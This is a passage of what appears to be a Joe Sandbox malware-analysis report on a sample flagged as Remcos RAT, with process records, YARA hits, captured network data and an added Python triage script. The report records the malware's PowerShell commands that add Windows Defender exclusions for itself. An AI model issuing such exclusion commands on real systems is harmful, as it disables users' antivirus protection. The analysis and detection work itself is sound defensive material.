x-ms-version: 2009-09-19
x-ms-meta-jssdkver: 4.3.3
x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
Access-Control-Allow-Origin: *
x-azure-ref: 20250103T230210Z-156796c549btxqbfhC1EWR2hbg0000000ssg0000000070ep
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                                                                          Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                                                                          Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                                                                          2025-01-03 23:02:10 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                                                                          Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


Target ID: 0
Start time: 18:01:54
Start date: 03/01/2025
Path: C:\Users\user\Desktop\iGhDjzEiDU.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\iGhDjzEiDU.exe"
Imagebase: 0xb70000
File size: 983'040 bytes
MD5 hash: 7CAF240DB905F259197CF71B03ACF888
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1688374211.0000000004149000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1688374211.0000000004185000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 2
Start time: 18:01:57
Start date: 03/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe"
Imagebase: 0xd10000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 18:01:57
Start date: 03/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 18:01:57
Start date: 03/01/2025
Path: C:\Users\user\Desktop\iGhDjzEiDU.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\iGhDjzEiDU.exe"
Imagebase: 0x370000
File size: 983'040 bytes
MD5 hash: 7CAF240DB905F259197CF71B03ACF888
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 5
Start time: 18:01:57
Start date: 03/01/2025
Path: C:\Users\user\Desktop\iGhDjzEiDU.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\iGhDjzEiDU.exe"
Imagebase: 0x510000
File size: 983'040 bytes
MD5 hash: 7CAF240DB905F259197CF71B03ACF888
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                          Start time:18:01:58
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Graias\graias.exe"
                                                                                                                                                                                                                                          Imagebase:0x510000
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5 hash:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          • Detection: 71%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                          Start time:18:02:00
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                                                                                                                                                                                                                                          Imagebase:0xd10000
                                                                                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                          Start time:18:02:00
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Graias\graias.exe"
                                                                                                                                                                                                                                          Imagebase:0xb10000
                                                                                                                                                                                                                                          File size:983'040 bytes
                                                                                                                                                                                                                                          MD5 hash:7CAF240DB905F259197CF71B03ACF888
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                          Start time:18:02:00
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                          Start time:18:02:00
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

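The process records above show three things a responder would want to check on a host, not just in the sandbox: the sample re-launched from C:\Users\user\AppData\Roaming\Graias\graias.exe with the same MD5 as the submitted file (Targets 6 and 8), a PowerShell child that adds that dropped file as a Windows Defender exclusion via Add-MpPreference -ExclusionPath (Target 7), and a 32-bit svchost.exe started with a bare "svchost.exe" command line (Target 10), which is not how services.exe starts service hosts (those always carry a -k <group> argument) and fits the "Injects a PE file into a foreign processes" signature. The following triage script is an added example, not part of the Joe Sandbox report or of any Joe Security tooling: it runs those three checks over process-creation records. The record layout (a dict with id, path, commandline and md5) and the list of user-writable directories are assumptions chosen for the example; the sample records are constructed by transcribing the values shown in this section.

```python
"""Added example (not from the report): triage checks over process-creation
records shaped like the entries in this Joe Sandbox process list.

Assumptions (hypothetical, not from the page): a record is a dict with the
keys 'id', 'path', 'commandline' and 'md5'.  SAMPLE_MD5 is the MD5 of the
submitted sample as listed in the report header.
"""
import re

SAMPLE_MD5 = "7caf240db905f259197cf71b03acf888"
SAMPLE_NAME = "iGhDjzEiDU.exe"

# Directories a standard user can write to.  A Defender exclusion or a
# persisted binary under one of these deserves a closer look.  (Assumed list.)
USER_WRITABLE = (
    "\\appdata\\roaming\\",
    "\\appdata\\local\\",
    "\\users\\public\\",
    "\\programdata\\",
    "\\temp\\",
)

# Add-MpPreference -ExclusionPath|-ExclusionProcess|-ExclusionExtension <value>
# The value may be quoted (paths with spaces) or bare.
_EXCL_RE = re.compile(
    r'add-mppreference\s+-exclusion(path|process|extension)\s+(?:"([^"]+)"|(\S+))',
    re.IGNORECASE,
)


def defender_exclusion(record):
    """Return (kind, value) if the command line adds a Defender exclusion, else None."""
    m = _EXCL_RE.search(record["commandline"])
    if not m:
        return None
    return m.group(1).lower(), (m.group(2) or m.group(3))


def in_user_writable(path):
    """True if the path sits under a directory a non-admin user can write to."""
    p = path.lower().replace("/", "\\")
    return any(marker in p for marker in USER_WRITABLE)


def is_sample_copy(record, sample_md5=SAMPLE_MD5, sample_name=SAMPLE_NAME):
    """True when the image has the submitted sample's hash but a different file
    name, i.e. the sample copied itself somewhere (staging / persistence)."""
    base = record["path"].rsplit("\\", 1)[-1].lower()
    return record["md5"].lower() == sample_md5.lower() and base != sample_name.lower()


def suspicious_svchost(record):
    """services.exe starts every legitimate svchost.exe with '-k <group>'.
    A svchost.exe whose command line lacks -k is a common hollowed-host sign."""
    base = record["path"].rsplit("\\", 1)[-1].lower()
    if base != "svchost.exe":
        return False
    return re.search(r"\s-k\s", record["commandline"], re.IGNORECASE) is None


def triage(records, sample_md5=SAMPLE_MD5, sample_name=SAMPLE_NAME):
    """Run all checks; return a list of (target_id, finding) tuples in record order."""
    findings = []
    for r in records:
        excl = defender_exclusion(r)
        if excl:
            kind, value = excl
            sev = "high" if in_user_writable(value) else "medium"
            findings.append((r["id"], f"{sev}: Defender {kind} exclusion added for {value}"))
        if is_sample_copy(r, sample_md5, sample_name):
            findings.append((r["id"], f"high: sample copied to {r['path']} (same MD5)"))
        if suspicious_svchost(r):
            findings.append((r["id"], "high: svchost.exe without '-k <group>' (possible process hollowing)"))
    return findings


# Constructed records, transcribed from Targets 6, 7, 9 and 10 above.
RECORDS = [
    {"id": 6, "path": r"C:\Users\user\AppData\Roaming\Graias\graias.exe",
     "commandline": r'"C:\Users\user\AppData\Roaming\Graias\graias.exe"',
     "md5": "7CAF240DB905F259197CF71B03ACF888"},
    {"id": 7, "path": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "commandline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"',
     "md5": "C32CA4ACFCC635EC1EA6ED8A34DF5FAC"},
    {"id": 9, "path": r"C:\Windows\System32\conhost.exe",
     "commandline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "md5": "0D698AF330FD17BEE3BF90011D49251D"},
    {"id": 10, "path": r"C:\Windows\SysWOW64\svchost.exe",
     "commandline": "svchost.exe",
     "md5": "1ED18311E3DA35942DB37D15FA40CC5B"},
]

if __name__ == "__main__":
    for target_id, finding in triage(RECORDS):
        print(f"Target {target_id}: {finding}")
```

On a live host, confirm whether the exclusion actually landed with `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` in an elevated PowerShell, and remove it with `Remove-MpPreference -ExclusionPath <path>`; the exclusion only succeeds when the PowerShell process runs elevated, which is consistent with the "Has elevated privileges:true" flags on Targets 6 and 7 and the CMSTP UAC-bypass rule hits listed above.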
                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                          Start time:18:02:01
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                          Imagebase:0x7ff693ab0000
                                                                                                                                                                                                                                          File size:496'640 bytes
                                                                                                                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                          Start time:18:02:04
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                          Start time:18:02:04
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,13104816673025473941,13422850102401617178,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:14
Start time:18:02:09
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:15
Start time:18:02:09
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2052,i,5101334319077942357,3031038982098258924,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:18:02:10
Start date:03/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x3a0000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:18:02:12
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:18:02:13
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1748 --field-trial-handle=2016,i,6952115490064793543,9344193390170368015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:18:02:16
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:18:02:16
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,6037255309931644860,773684642686352873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:18:02:17
Start date:03/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x3a0000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:18:02:21
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:18:02:21
Start date:03/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1988,i,6741851451867710431,3176181943120798108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                          Start time:18:02:22
                                                                                                                                                                                                                                          Start date:03/01/2025
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:svchost.exe
                                                                                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                                                                                          File size:46'504 bytes
                                                                                                                                                                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                                                          Start time:18:02:28
                                                                                                                                                                                                                                          Start date:03/01/2025
